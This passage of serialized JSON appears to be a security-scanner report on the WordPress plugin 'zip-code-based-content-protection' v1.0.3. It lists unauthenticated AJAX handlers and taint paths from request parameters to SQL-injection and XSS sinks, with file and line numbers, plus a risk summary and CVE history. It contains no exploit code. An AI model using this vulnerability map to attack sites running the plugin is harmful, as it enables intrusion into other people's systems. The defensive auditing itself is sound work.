eview_registered_users_in_zipcode",183,{"action":275,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":276},"view_posts_registered_users_in_zipcode",184,{"action":278,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":279},"insert_zipcode_into_database",185,{"action":281,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":282},"insert_multiple_zipcode_into_database",186,{"action":284,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":285},"get_zipcode_from_api",187,{"action":287,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":288},"check_zipcode_from_post_page_meta",213,{"action":287,"nopriv":290,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":291},true,214,{"action":293,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":294},"submit_email_against_zipcode",215,{"action":293,"nopriv":290,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":296},216,[],[],[],{"dangerousFunctions":301,"sqlUsage":302,"outputEscaping":308,"fileOperations":43,"externalRequests":13,"nonceChecks":11,"capabilityChecks":13,"bundledLibraries":358},[],{"prepared":303,"raw":43,"locations":304},29,[305],{"file":199,"line":306,"context":307},127,"$wpdb->get_var() with variable interpolation",{"escaped":309,"rawEcho":100,"locations":310},150,[311,315,316,318,320,322,324,326,328,330,332,334,336,338,341,342,344,346,348,349,351,354,356],{"file":312,"line":313,"context":314},"admin\\class-zipcode-bcp-admin.php",144,"raw 
output",{"file":312,"line":273,"context":314},{"file":312,"line":317,"context":314},224,{"file":312,"line":319,"context":314},235,{"file":312,"line":321,"context":314},247,{"file":312,"line":323,"context":314},259,{"file":312,"line":325,"context":314},271,{"file":312,"line":327,"context":314},321,{"file":312,"line":329,"context":314},332,{"file":312,"line":331,"context":314},344,{"file":312,"line":333,"context":314},356,{"file":312,"line":335,"context":314},392,{"file":312,"line":337,"context":314},403,{"file":339,"line":340,"context":314},"admin\\settings\\class-zipcode-bcp-admin-settings.php",180,{"file":265,"line":235,"context":314},{"file":265,"line":343,"context":314},230,{"file":265,"line":345,"context":314},242,{"file":265,"line":347,"context":314},254,{"file":265,"line":205,"context":314},{"file":265,"line":350,"context":314},370,{"file":352,"line":353,"context":314},"public\\partials\\zipcode-bcp-public-display.php",45,{"file":352,"line":355,"context":314},47,{"file":352,"line":357,"context":314},50,[359],{"name":360,"version":34,"knownCves":361},"Select2",[],[363,381,390,400,411,426,439,449,460],{"entryPoint":364,"graph":365,"unsanitizedCount":13,"severity":380},"zbcp_export_registered_users_in_zipcode (admin\\class-zipcode-bcp-admin.php:87)",{"nodes":366,"edges":378},[367,372],{"id":368,"type":369,"label":370,"file":312,"line":371},"n0","source","$_REQUEST",94,{"id":373,"type":374,"label":375,"file":312,"line":376,"wp_function":377},"n1","sink","get_results() [SQLi]",107,"get_results",[379],{"from":368,"to":373,"sanitized":290},"low",{"entryPoint":382,"graph":383,"unsanitizedCount":13,"severity":380},"zbcp_preview_registered_users_in_zipcode 
(admin\\class-zipcode-bcp-admin.php:121)",{"nodes":384,"edges":388},[385,386],{"id":368,"type":369,"label":370,"file":312,"line":306},{"id":373,"type":374,"label":375,"file":312,"line":387,"wp_function":377},139,[389],{"from":368,"to":373,"sanitized":290},{"entryPoint":391,"graph":392,"unsanitizedCount":13,"severity":380},"zbcp_view_posts_registered_users_in_zipcode (admin\\class-zipcode-bcp-admin.php:154)",{"nodes":393,"edges":398},[394,396],{"id":368,"type":369,"label":370,"file":312,"line":395},158,{"id":373,"type":374,"label":375,"file":312,"line":397,"wp_function":377},165,[399],{"from":368,"to":373,"sanitized":290},{"entryPoint":401,"graph":402,"unsanitizedCount":13,"severity":380},"zbcp_insert_zipcode_into_database (admin\\class-zipcode-bcp-admin.php:201)",{"nodes":403,"edges":409},[404,406],{"id":368,"type":369,"label":405,"file":312,"line":251},"$_POST",{"id":373,"type":374,"label":407,"file":312,"line":257,"wp_function":408},"get_var() [SQLi]","get_var",[410],{"from":368,"to":373,"sanitized":290},{"entryPoint":412,"graph":413,"unsanitizedCount":13,"severity":380},"\u003Cclass-zipcode-bcp-admin> (admin\\class-zipcode-bcp-admin.php:0)",{"nodes":414,"edges":423},[415,417,418,421],{"id":368,"type":369,"label":416,"file":312,"line":371},"$_REQUEST (x3)",{"id":373,"type":374,"label":375,"file":312,"line":376,"wp_function":377},{"id":419,"type":369,"label":420,"file":312,"line":251},"n2","$_POST (x2)",{"id":422,"type":374,"label":407,"file":312,"line":257,"wp_function":408},"n3",[424,425],{"from":368,"to":373,"sanitized":290},{"from":419,"to":422,"sanitized":290},{"entryPoint":427,"graph":428,"unsanitizedCount":13,"severity":380},"check_zipcode_from_post_page_meta 
(public\\class-zipcode-bcp-public.php:157)",{"nodes":429,"edges":436},[430,432,433,434],{"id":368,"type":369,"label":405,"file":265,"line":431},167,{"id":373,"type":374,"label":407,"file":265,"line":237,"wp_function":408},{"id":419,"type":369,"label":405,"file":265,"line":431},{"id":422,"type":374,"label":375,"file":265,"line":435,"wp_function":377},204,[437,438],{"from":368,"to":373,"sanitized":290},{"from":419,"to":422,"sanitized":290},{"entryPoint":440,"graph":441,"unsanitizedCount":13,"severity":380},"submit_email_against_zipcode (public\\class-zipcode-bcp-public.php:317)",{"nodes":442,"edges":447},[443,445],{"id":368,"type":369,"label":405,"file":265,"line":444},326,{"id":373,"type":374,"label":407,"file":265,"line":446,"wp_function":408},342,[448],{"from":368,"to":373,"sanitized":290},{"entryPoint":450,"graph":451,"unsanitizedCount":13,"severity":380},"\u003Cclass-zipcode-bcp-public> (public\\class-zipcode-bcp-public.php:0)",{"nodes":452,"edges":457},[453,454,455,456],{"id":368,"type":369,"label":420,"file":265,"line":431},{"id":373,"type":374,"label":407,"file":265,"line":237,"wp_function":408},{"id":419,"type":369,"label":405,"file":265,"line":431},{"id":422,"type":374,"label":375,"file":265,"line":435,"wp_function":377},[458,459],{"from":368,"to":373,"sanitized":290},{"from":419,"to":422,"sanitized":290},{"entryPoint":461,"graph":462,"unsanitizedCount":43,"severity":380},"\u003Czipcode-bcp-public-display> (public\\partials\\zipcode-bcp-public-display.php:0)",{"nodes":463,"edges":470},[464,467],{"id":368,"type":369,"label":465,"file":352,"line":466},"$_GET",16,{"id":373,"type":374,"label":468,"file":352,"line":353,"wp_function":469},"echo() [XSS]","echo",[471],{"from":368,"to":373,"sanitized":54},{"summary":473,"deductions":474},"The plugin 'zip-code-based-content-protection' v1.0.3 presents a mixed security posture. 
While it demonstrates good practices by heavily utilizing prepared statements for SQL queries (97%) and properly escaping a high percentage of output (87%), significant concerns arise from its attack surface. All 10 identified AJAX handlers lack authentication checks, making them prime targets for unauthorized actions. This, coupled with a complete absence of capability checks on any entry point, suggests a widespread potential for privilege escalation or unauthorized data manipulation.\n\nThe vulnerability history is also a red flag. Despite no currently unpatched CVEs, the plugin has a history of two known vulnerabilities, with one classified as high severity. That the common vulnerability type is SQL Injection is particularly worrying, especially in light of the observed lack of authentication on AJAX handlers, which could be leveraged to exploit such weaknesses. The single unsanitized path found by taint analysis, though not of critical or high severity, further reinforces the need for caution. The plugin's reliance on bundled Select2, while common, could also pose a risk if the bundled version is outdated and contains known vulnerabilities.\n\nIn conclusion, the plugin shows some strengths in its handling of database queries and output sanitization. However, the lack of authentication and authorization on its entire AJAX attack surface, combined with its past vulnerability history, particularly for SQL injection, elevates the risk considerably. 
The absence of capability checks on any entry point is a critical oversight that requires immediate attention to secure the plugin effectively.",[475,477,479,481,483,486],{"reason":476,"points":11},"All AJAX handlers unprotected",{"reason":478,"points":11},"No capability checks",{"reason":480,"points":122},"1 unsanitized path flow",{"reason":482,"points":55},"Bundled library (Select2)",{"reason":484,"points":485},"History of 1 high severity CVE",15,{"reason":487,"points":11},"History of 1 medium severity CVE","2026-03-17T00:21:12.783Z",{"wat":490,"direct":501},{"assetPaths":491,"generatorPatterns":496,"scriptPaths":497,"versionParams":498},[492,493,494,495],"\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fcss\u002Fselect2.min.css","\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fcss\u002Fzipcode-bcp-admin.css","\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fjs\u002Fselect2.full.min.js","\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fjs\u002Fzipcode-bcp-admin.js",[],[],[499,500],"zipcode-bcp-admin.css?ver=","zipcode-bcp-admin.js?ver=",{"cssClasses":502,"htmlComments":503,"htmlAttributes":504,"restEndpoints":506,"jsGlobals":507,"shortcodeOutput":509},[],[],[505],"data-plugin-name=\"zipcode-bcp\"",[],[508],"frontend_ajax_object",[],{"error":290,"url":511,"statusCode":512,"statusMessage":513,"message":513},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fzip-code-based-content-protection\u002Fbundle",404,"no bundle for this plugin 
yet",{"slug":4,"current_version":6,"total_versions":55,"versions":515},[516,521,528],{"version":6,"download_url":22,"svn_tag_url":517,"released_at":34,"has_diff":54,"diff_files_changed":518,"diff_lines":34,"trac_diff_url":519,"vulnerabilities":520,"is_current":290},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fzip-code-based-content-protection\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.1&new_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.3",[],{"version":70,"download_url":522,"svn_tag_url":523,"released_at":34,"has_diff":54,"diff_files_changed":524,"diff_lines":34,"trac_diff_url":525,"vulnerabilities":526,"is_current":54},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzip-code-based-content-protection.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fzip-code-based-content-protection\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.0&new_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.1",[527],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":529,"download_url":530,"svn_tag_url":531,"released_at":34,"has_diff":54,"diff_files_changed":532,"diff_lines":34,"trac_diff_url":34,"vulnerabilities":533,"is_current":54},"1.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzip-code-based-content-protection.1.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fzip-code-based-content-protection\u002Ftags\u002F1.0.0\u002F",[],[534,535],{"id":65,"url_slug":66,"title":67,"severity":71,"cvss_score":72,"vuln_type":39,"patched_in_version":70},{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6}]